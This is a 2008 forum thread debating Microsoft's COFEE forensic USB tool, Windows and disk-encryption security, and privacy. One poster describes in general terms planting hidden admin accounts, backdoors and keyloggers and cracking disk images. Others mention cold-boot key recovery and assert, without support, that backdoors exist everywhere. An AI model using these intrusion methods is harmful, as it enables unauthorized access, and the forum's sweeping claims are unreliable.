So you see Stanley, we don't need you.
Posted on 05/02/2008 5:02:14 PM PDT by Dawnsblood
Last Summer, Microsoft Corporation quietly introduced a powerful tool for getting past security on laptops and PCs running the Windows operations system (which about 90 percent do). The device is a USB thumb drive called COFEE (Computer Online Forensic Evidence Extractor). When you capture an enemy computer, you plug in COFEE and then use over a hundred software to quickly get whatever information is on the machine. COFEE can quickly reveal passwords, decrypt files, reveal recent Internet activity and much more. A lot of this can be done without COFEE, but with the Microsoft device, intelligence collection is a lot faster.
Microsoft has distributed thousands of COFEE devices to police and military intelligence personnel in the United States, and some foreign countries. COFEE was developed mainly to assist the investigation of Internet based crime. But military intelligence operators find it very useful in uncovering enemy plans. Islamic terrorists love their laptops, and never go killing without them.
And taht is why naughty stuff should be done in Linux.
PING!
It is really quite easy to disable USB drives on a Windows machine. It’s just a few registry entries, and then this device would be useless without an admin account on the target machine.
So you see Stanley, we don't need you.
Does anyone think it unwise to alert the “Evil Doers” that Mr. Softee might be on to them?
Microsoft has distributed thousands of COFEE devices to police and military intelligence personnel in the United States, and some foreign countries.
Any device that was distributed “by the thousands” to police and military, has almost certainly been obtained by criminal organizations by now
It seems that most of Bill’s recent speeches contained something or other about identifying/monitoring individual users (e.g., personal handwriting signature recognition by tablets, tabletops,...).
This COFFEE software has to be available on the Internet by now. I want to download a copy.
All of the really good USB exploits for Windows operate at the BIOS on the motherboard. I have yet to test a really good Windows port security program that could withstand rudimentary hacking.
I don't really care what you've done with your registry entries. If I can get physical access to your computer I own the box. If you are connected to the network, I own the network. I can create hidden Administrator accounts on every WIndows device your computer "sees" on the network in a matter of seconds. Exploitation of trust relationships and escalation of privileges is trivial in Windows.
You don't even need an exploit to do this. You can buy WinKey from PassAware and do the same thing with a USB drive, DVD, or CD. The only difference is that you will make log entries, leave tracks showing that you did it, the machine will require a reboot, and the process takes minutes instead of seconds.
BINGO!
Poor writing skills aside, there is no back door here. It automates commands that would normally have to be entered by hand on a logged-in computer. I’ll grant there may be a rainbow brute force cracker, but those have been freely available for years now.
Much ado about nothing, but y’all can feel free to enjoy the knot in your panties.
If the usb device is bootable, as long as it can read the filesystem, it doesn’t matter if it’s a windows box, Linux machine, Apple, BSD. As long as the filesystem isn’t encrypted, you can read it. And if you are from NSA you can read anything, encrypted or not.
Jack
I believe the point was this Tech eventually falling into the hands of ID and Data theives....
That would be the government snoops who have no inherent right to your information.
The 4th amendment states the people shall be secure in...their papers....;oh silly me,I forgot the Bill of Rights is only a piece of paper.
There is a back door into EVERY program and operating system. Programmers can't help it. They are nosy.
I can only assume, but I'm most certain they boot from this device and it can target the local hard drives while the host OS is offline. Just like accessing files with a 'live CD'.
It is really quite easy to disable USB drives on a Windows machine. It’s just a few registry entries, and then this device would be useless without an admin account on the target machine.Except that the registry entries you mention are only relevant if you've booted into the OS on the machine. Devices like this, and other approaches like bootable CDs, have their own OS on them.
A necessary, but not sufficient, condition to security is to control physical access to the machine.
My corporate laptop has an encrypted C: drive and has the USB port disabled.
If you got my laptop when it was booted, and put a USB stick in the port, the filesystem wouldn’t mount. You would have to type in a valid ID and password to get access through the keyboard. You get three tries before the account is locked.
If you got my laptop when it was not booted, you might be able to boot from the USB port, but then how would you read the encrypted C: drive?
“you plug in COFEE and then use over a hundred software”
I guess English isn’t this person’s first language.
This is an official corporate secure laptop.
I have no idea how secure it really is, I haven’t tried to crack it myself. I think you can get a backdoor to the encryption from the vendor.
If you got my laptop when it was not booted, you might be able to boot from the USB port, but then how would you read the encrypted C: drive?
There was a technique discovered that that involves freezing the memory chips of a computer with an encrypted HD, and moving them to another computer to be analyzed. I believe they were able to recover the encryption keys stored in memory from computers that had been powered off for as long as 20 minutes.
When you encrypt the HD, the operating system has to decrypt it. In order to do that it needs the keys in working memory. RAM is technically volatile memory, but it does exhibit some persistence. Freezing the chips seems to extend that period of persistence considerably.
I believe that's where this tool from MS could be stopped.
How easy is it to break True Crypt encryption?
How easy is it to break the Dell - IBM/Hitachi full drive encryption without remounting the platters?
If I’m the NSA, I’d read your encrypted C drive :)
Heck, the vendor can do that. This is corporate encryption. No corporation would want to buy a product with no backdoors.
and then this device would be useless without an admin account on the target machine.
Like that's hard to get.
Well, that, and the fact that your hard drive ISN'T paper. So, you know, obviously 4A shouldn't apply. ;-)
I got to get one of those!
I don't need the USB drive to mount. I also don't need keyboard access. The tools and scripts will install the hidden Administrator accounts and backdoors in non-standard file locations without creating system log entries or otherwise alerting an Intrusion Detection System (IDS) or Systems Administrator.
The really sophisticated hacks will use pseudo-random number generators to hide the Admin accounts and backdoors in the disk free space. Of course, if you regularly wipe disk free space, you could undo my work.
If you got my laptop when it was not booted, you might be able to boot from the USB port, but then how would you read the encrypted C: drive?
Again, I don't need the machine to boot into Windows. I don't even need Windows to be running. Everything happen at the BIOS and below. I just get complete access to Windows when it is running.
You read an encrypted hard drive the same way you do forensics on any hard drive. Make an image of the disk, take it offline and use one of the many cracking programs available on the hash file.
Alternatively, leave a hidden Administrator account, a keystroke logger and a backdoor. Wait until you log in again to record and recover the password.
Your faith in commercial encryption is touching but naive. Not that encrypting data at rest is a bad idea, but there is no silver bullet solution for computer and network security.
Properly securing a network takes a combination of people, processes, and technology. When you do it, the bottom line doesn't contain too many zeros for most organizations, but too many commas.
However, to a sophisticated enough threat, if you only partially pay the bill, it's as if your network is still wide open.
I’d be interested in both of your assessments of Truecrypt.
Much ado about nothing, but y’all can feel free to enjoy the knot in your panties.
Well, it's good to know that all passwords and everything else is wide open to anyone who logs into a Windows box, even without administrator privs. Kinda puts the "security" on said computers into perspective doesn't it?
It’s been obvious for a long time that nothing can stop the police from reading anything they please. Unless there is a real life Cryptonomicron store house somewhere.
You knew you were full of crap when you typed that, so why did you bother?
That's rich. A windows apologist accusing someone of being full of crap. LOL.
As always, the answer is: "It depends."
What are you trying to do? How does it fit in your larger security scheme? What other weaknesses or avenues of approach are available to the threat?
Truecrypt is open source, supports multiple encryption methods, is cross-platform, and there is no readily available backdoor of which I am aware.
If you are encrypting thumb drives and other portable media it is probably a good choice. I wouldn't bet the ranch on the "hidden volume" feature against a skilled computer forensics specialist with time, money, and motivation. They may not break the encryption right away, but they will soon realize that there is something else there.
Like every other form of encryption it is susceptible to brute force and can eventually be broken.
In all likelihood other weaknesses in your device or network will provide the threat with access before they brute force Truecrypt.
Just my $0.02 worth.
I am not so much concerned about the government’s ability to break the Dell boot up password or IBM hard drive control encryption, or beyond that my True Crypt volume as they would have no need. It’s not as if I am sending tens of thousands of dollars to Islamic terrorist groups, or anyone else for that matter so they would not need my bank account or credit card info.
I am only concerned about the for fun or for profit hacker. With the Dell boot up protection you can’t boot from anything including a CD or a USB drive - so I think you have to break it to get access. I understand Dell will not release the back door for the BIOS or the hard drive without proof of ownership, but I suspect there are programs out there to break it. But once that’s done on mine you still have to deal with the True Crypt volume. It does not have a back door. It uses very secure algorithms. It does not write any info to the page file. It would seem like it would be way too much work for anyone except the NSA.
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.